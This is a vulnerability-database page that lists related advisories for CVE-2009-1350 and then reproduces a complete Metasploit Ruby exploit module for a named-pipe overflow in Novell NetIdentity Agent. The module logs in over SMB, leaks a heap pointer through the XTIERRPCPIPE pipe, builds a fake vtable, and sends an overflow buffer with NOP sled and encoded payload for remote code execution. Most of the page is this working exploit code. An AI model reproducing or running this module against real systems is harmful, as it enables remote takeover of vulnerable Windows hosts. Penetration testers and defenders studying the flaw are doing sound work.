Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow

🗓️ 26 Nov 2009 00:00:00Reported by Ruben SantamartaType

packetstorm🔗 packetstormsecurity.com👁 90 Views

Novell NetIdentity Agent XTIERRPCPIPE Buffer Overflo

Reporter	Title	Published	Views	Family All 20
Circl	CVE-2009-1350	24 Nov 201000:00	–	circl
Check Point Advisories	Update Protection against Novell Client NetIdentity Agent Remote Code Execution	24 Jul 200900:00	–	checkpoint_advisories
Check Point Advisories	Novell Client NetIdentity Agent Remote Pointer Dereference Code Execution - Ver2 (CVE-2009-1350)	7 Jan 201400:00	–	checkpoint_advisories
Check Point Advisories	Novell Client NetIdentity Agent Remote Pointer Dereference Code Execution - Ver2 (CVE-2009-1350)	7 Jan 201400:00	–	checkpoint_advisories
Check Point Advisories	Novell NeaatIdentity RPC Pointer Dereference Code Execution - Ver2 (CVE-2009-1350)	3 Feb 201400:00	–	checkpoint_advisories
CVE	CVE-2009-1350	21 Apr 200916:00	–	cve
Cvelist	CVE-2009-1350	21 Apr 200916:00	–	cvelist
Exploit DB	Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)	24 Nov 201000:00	–	exploitdb
Metasploit	Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow	21 Jul 200901:04	–	metasploit
Tenable Nessus	Novell NetIdentity Agent < 1.2.4 Arbitrary Pointer De-reference Code Execution	7 Apr 200900:00	–	nessus

`##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::SMB  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow.',  
'Description' => %q{  
This module exploits a stack overflow in Novell's NetIdentity Agent. When sending  
a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be  
able to execute arbitrary code. The success of this module is much greater once the  
service has been restarted.  
},  
'Author' => [ 'MC', 'Ruben Santamarta' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2009-1350' ],  
[ 'OSVDB', '53351' ],  
[ 'BID', '34400' ],  
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process', # only one shot!  
},  
'Payload' =>  
{  
'Space' => 550,  
'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",  
'StackAdjustment' => -3500,  
'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],  
],  
'Privileged' => true,  
'DisclosureDate' => 'Apr 6 2009',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit']),  
OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'])  
], self.class )  
end  
  
def mem_leak  
print_status("Connecting to the server...")  
connect()  
  
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")  
  
begin  
smb_login()  
rescue ::Exception => e  
print_error("Error: #{e}")  
disconnect  
return  
end  
  
print_status("Connecting to named pipe \\XTIERRPCPIPE...")  
  
# If the pipe doesn't exist, bail.  
begin  
pipe = simple.create_pipe('\\XTIERRPCPIPE')  
rescue ::Exception => e  
print_error("Error: #{e}")  
disconnect  
return  
end  
  
# If we get this far, do the dance.  
fid = pipe.file_id  
  
# Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id  
trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')  
  
# Send the first request to get our pointer.   
leak = [0x00000004].pack('V') + [0x00000818].pack('V')  
leak << rand_text_alpha_upper(2040)  
  
print_status("Sending malformed request...")  
pipe.write(leak)  
  
heap_pointer_leaked = pipe.read()[2060,4].unpack('V')[0]  
print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))  
  
print_status("Building fake VTable...")  
object = heap_pointer_leaked + 0x700  
print_status(sprintf("Object: 0x%.8x", object))  
method = object + 0x30  
print_status(sprintf("Method: 0x%.8x", method))  
shellcode = method + 0xA0  
print_status(sprintf("Shellcode: 0x%.8x", shellcode))  
  
pipe.close  
  
return heap_pointer_leaked,object,method,shellcode   
end  
  
def exploit  
heap_pointer_leaked,object,method,shellcode = mem_leak()  
  
sploit = [0x00000002].pack('V')  
sploit << [0x00000000].pack('V')  
sploit << [object].pack('V')  
sploit << [0x00000000].pack('V')  
sploit << rand_text_alpha_upper(240)  
sploit << [object].pack('V') * 32  
sploit << [method].pack('V') * 32  
sploit << [shellcode].pack('V') * 32  
sploit << make_nops(748)  
sploit << payload.encoded  
sploit << rand_text_alpha_upper(110)  
  
print_status("Connecting to the server...")  
connect()  
  
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")  
  
begin  
smb_login()  
rescue ::Exception => e  
print_error("Error: #{e}")  
disconnect  
return  
end  
  
print_status("Connecting to named pipe \\XTIERRPCPIPE...")  
  
# If the pipe doesn't exist, bail.  
begin  
pipe = simple.create_pipe('\\XTIERRPCPIPE')  
rescue ::Exception => e  
print_error("Error: #{e}")  
disconnect  
return  
end  
  
# ok, set up and send our exploit buffer...  
fid = pipe.file_id  
trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')  
print_status("#{sploit.length} bytes written...")  
pipe.write(sploit)  
  
handler  
disconnect  
end  
end  
`

26 Nov 2009 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.65934